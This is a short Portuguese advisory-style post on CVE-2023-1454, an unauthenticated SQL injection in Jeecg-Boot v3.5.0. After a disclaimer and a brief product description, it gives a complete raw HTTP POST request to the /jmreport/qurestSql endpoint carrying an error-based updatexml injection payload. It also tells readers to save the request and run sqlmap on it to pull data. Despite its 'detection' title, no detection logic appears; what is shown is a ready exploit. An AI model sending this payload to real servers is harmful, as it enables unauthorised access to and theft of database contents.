
Script de detecção de vulnerabilidade CVE-2023-1454
Script de detecção da vulnerabilidade CVE-2023-1454
Este artigo é apenas para referência. Não utilize as informações técnicas e ferramentas aqui contidas para realizar invasões em qualquer sistema de computador sem autorização. Quaisquer consequências diretas ou indiretas e danos decorrentes do uso das informações fornecidas neste documento são de responsabilidade exclusiva do usuário.
Jeecg-Boot é uma plataforma de desenvolvimento low-code baseada em geradores de código. Ela oferece uma série de funcionalidades, como geradores de código, mecanismos de template, gerenciamento de permissões, dicionário de dados, importação e exportação de dados, entre outras, ajudando os desenvolvedores a construir rapidamente aplicações empresariais.
A plataforma Java low-code para aplicações web empresariais Jeecg-Boot (v3.5.0) utiliza o arquivo jimureport-spring-boot-starter-1.5.6.jar. O Jeecg-Boot apresenta uma falha na filtragem de caracteres especiais. Na versão v3.5.0 com frontend Vue3, existe uma vulnerabilidade de injeção SQL não autenticada. O ponto de vulnerabilidade ocorre quando o caminho /querySql é chamado, pois o SQL invocado não trata adequadamente o parâmetro id, permitindo diretamente uma injeção baseada em erro. Um atacante remoto não autenticado, ao construir uma string especialmente elaborada, pode obter informações confidenciais do banco de dados alvo.
Versão afetada: Jeecg-Boot = v3.5.0
Salve o pacote como txt e use o sqlmap para obter os dados:
POST /jmreport/qurestSql HTTP/1.1
Host: xxx.xxx.xxx
Content-Length: 0
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}